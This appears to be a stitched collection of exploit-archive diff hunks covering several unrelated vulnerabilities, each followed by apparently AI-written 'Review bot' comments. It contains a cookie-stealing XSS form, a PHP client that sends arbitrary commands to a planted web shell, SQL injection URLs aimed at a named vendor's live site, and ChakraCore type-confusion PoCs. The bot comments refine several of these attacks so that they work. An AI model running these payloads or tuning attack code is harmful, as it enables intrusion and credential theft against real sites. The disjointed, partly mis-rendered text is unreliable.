An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.

<form action="http://your-server/path-to-sphpblog/preview_static_cgi.php" method="post">
<input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
<input type="submit"/>
</form>

@ -27,7 +27,7 @@ extract($_POST);extract($_GET);
print "<pre>URL:<form method=post><input size=80 name=url value=`$url`>";
if (strlen($eval)>3){
$eval=stripslashes($eval);
print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90>$eval</textarea>";
print "<input type=submit value='Eval'></form>";
$res=curl("$url/images/emoticons/sphp.php","z=$eval");
$res=strstr($res,"GIF89a");
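Review bot: `print "<pre>URL:<form method=post><input size=80 name=url value=\`$url\`>";` quotes the attribute with backticks, which HTML does not recognise as attribute delimiters, so a `$url` containing a space or `>` breaks the helper's own form; with `extract($_POST);extract($_GET);` at the hunk header feeding `$url` and `$eval` straight from the request, the helper reflects unescaped input into its own page. Use `value="..."` with `htmlspecialchars($url)`. Also, `$res=strstr($res,"GIF89a");` keeps the response from the first `GIF89a` onward, so whatever the dropped `/images/emoticons/sphp.php` prints after its fake image header is what gets displayed; a comment saying so would spare the next reader from wondering why the command is posted as `z=$eval` to an emoticon.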
@ -76,7 +76,7 @@ if (strlen($url)>10)
print "\n<hr>Trying to Logout...";flush();
$res=curl($url."/logout.php","");
if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n<h1>Error To Logout</h1>\n\n\n$res");
print "\nEnter PHP Command:\n<textarea name=eval rows=10 cols=90></textarea>";
}
print "<input type=submit ></form>";
?>

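Review bot: `error("\n<h1>Error To Logout</h1>\n\n\n$res")` drops the complete raw server response into the helper's page; it needs the same `htmlspecialchars` treatment as `$url`, or should be printed inside a `<pre>` as text. The success check `strstr($res,"You are now logged out")` is tied to the English UI string, so a localised blog reports "Error To Logout" even when the logout worked; checking for the session cookie being cleared, or the redirect the logout page issues, would be more robust than a string match.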
@ -45,12 +45,12 @@

POC:
http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
http://www.site.com/search_results.php?query=[XSS]

Live Demo:
http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
http://www.phpvid.com/search_results.php?query=<script>alert(0);</script>

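Review bot: `substring(@@version,1,1)=4` is a boolean-based check that only comes back true on a MySQL 4.x backend; against 5.x the injected condition is false and the page looks like a failed injection, so the PoC should carry the complementary true/false pair (`cat=4+and+1=1` versus `cat=4+and+1=2`) to show the differential, or probe `=5` as well. The "Live Demo" URLs point at the vendor's production site (www.phpvid.com); the archive entry should carry only the generic `www.site.com` form rather than a ready-made request against a third party.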
@ -204,7 +204,7 @@ You must know that all _GET _POST _REQUEST variables are sanizated in init.inc.p
File: /include/init.inc.php

// Do some cleanup in GET, POST and cookie data and un-register global vars
$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<', '>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<', '%3E' => '>','%27' => ''', "'" => ''');

...
$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);

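Review bot: as rendered, every entry in `$HTML_SUBST` maps a character to itself (`'&' => '&'`, `'<' => '<'`, ...), which would make `strtr(stripslashes($value), $HTML_SUBST)` a no-op; the right-hand sides are HTML entities (`&amp;`, `&quot;`, `&lt;`, `&gt;`, `&#039;`) that were decoded when the text was displayed, as the stray `'''` in `'%27' => '''` shows. The archived copy should store them escaped so the quoted sanitizer reads correctly. Since the hunk header states that the request variables are "sanizated" (sanitized) here, it is worth spelling out that the `%26`/`%22`/`%3C`/`%3E`/`%27` keys only match percent sequences that survive in already URL-decoded `$_POST` data, i.e. double-encoded input, and that `strtr` runs after `stripslashes`.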
36
platforms/windows/dos/40947.html
Executable file
@ -0,0 +1,36 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=961

The following code occurs in JavascriptSIMDObject::ToLocaleString in JavascriptSimdObject.cpp:

Var* newArgs = HeapNewArray(Var, numArgs);
switch (numArgs)
{
case 1:
break;
case 2:
newArgs[1] = args[1];
break;
case 3:
newArgs[1] = args[1];
newArgs[2] = args[2];
break;
default:
Assert(UNREACHED);
}

If the call has more than three arguments, it will fall through, leaving newArgs uninitialized. This will cause toLocaleString to be called on uninitialized memory, having a similar effect to type confusion (as integers in the memory can be confused for pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached:

var v = SIMD.Int32x4(1, 2, 3, 4);
v.toLocaleString(1, 2, 3, 4)
-->

<html><body><script>
try{
var v = SIMD.Int32x4(1, 2, 3, 4);
alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
}catch(e){
alert(e.message);

}
</script></body></html>
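Review bot: the comment says "a full PoC is attached", but this file carries only the minimal PoC, with `toLocaleString(1, 2, 3, 4, 5, 6, 7)` in place of the four-argument call from the write-up; either drop that sentence or point at the attachment on the linked Project Zero issue, so readers do not look for a second file. On the quoted code, `Assert(UNREACHED)` is a debug-build assertion, so in release builds the `default:` arm does nothing and the slots of `HeapNewArray(Var, numArgs)` beyond index 0 stay uninitialized, which is exactly the condition the next paragraph describes; saying "release build" there would make it explicit. The `try/catch` around the call only reports a thrown exception; a crash from dereferencing the uninitialized `Var` values is not catchable, so a successful trigger will not show the second `alert`.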
64
platforms/windows/dos/40948.html
Executable file
@ -0,0 +1,64 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=972

In Chakra, Internationlization is initialized the first time the Intl object is used, by executing the script in Intl.js (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/InJavascript/Intl.js). This code attempts to prevent Object methods from being redefined by user scripts, but there are a few stray calls to Object.defineProperty in initialization. If Object.defineProperty is redefined before Intl is initialized, a user-define method can be called during initialization. If this method defines a Collator (or DateTimeFormat or NumberFormat) getter and setter on the Intl object, it can intercept what it is set to, and set it to a different value instead. This will then cause type confusion in IntlEngineInterfaceExtensionObject::deletePrototypePropertyHelper (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/IntlEngineInterfaceExtensionObject.cpp), as this function assumes the properties of a Collator are objects, when they are not guaranteed to be. A minimal PoC is as follows, and a full PoC is attached.


var d = Object.defineProperty;

var noobj = {
get: function () {
return 0x1234567 >> 1;
},
set: function () {
}
};

function f(){
var i = Intl;
Intl = {}; // this somehow prevents an exception that prevents laoding
d(i, "Collator", noobj);
}


Object.defineProperty = f;

var q = new Intl.NumberFormat(["en"]);

</script></body></html>
-->

<html><body><script>

var d = Object.defineProperty;

var noobj = {
get: function () {
print("in get no");
return 0x1234567 >> 1;
},
set: function () {
print("in set no");
}
};

function f(...a){
var i = Intl;
Intl = {};
d(i, "Collator", noobj);

}

var pattern = {
get: function () {
return f;
},
set: function () {
}
};

Object.defineProperty(Object, "defineProperty", pattern);

var q = new Intl.NumberFormat(["en"]);

</script></body></html>
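Review bot: `print("in get no")` and `print("in set no")` in the `noobj` accessors are the JavaScript shell's output function; in a browser `print` resolves to `window.print()`, so every time the `Collator` getter fires the page opens a print dialog and the PoC stalls behind a modal. Use `console.log` or drop the calls. Minor: the comment block contains a stray `</script></body></html>` line before `-->` (carried over from the live PoC), and the description has "Internationlization", "user-define" and "laoding" for internationalization, user-defined and loading. The hook itself is sound: `f(...a)` ignores its arguments and never defines the property Intl.js asked for, instead installing `noobj`, whose getter returns the integer `0x1234567 >> 1` where `deletePrototypePropertyHelper` expects an object, which is the type confusion the write-up describes.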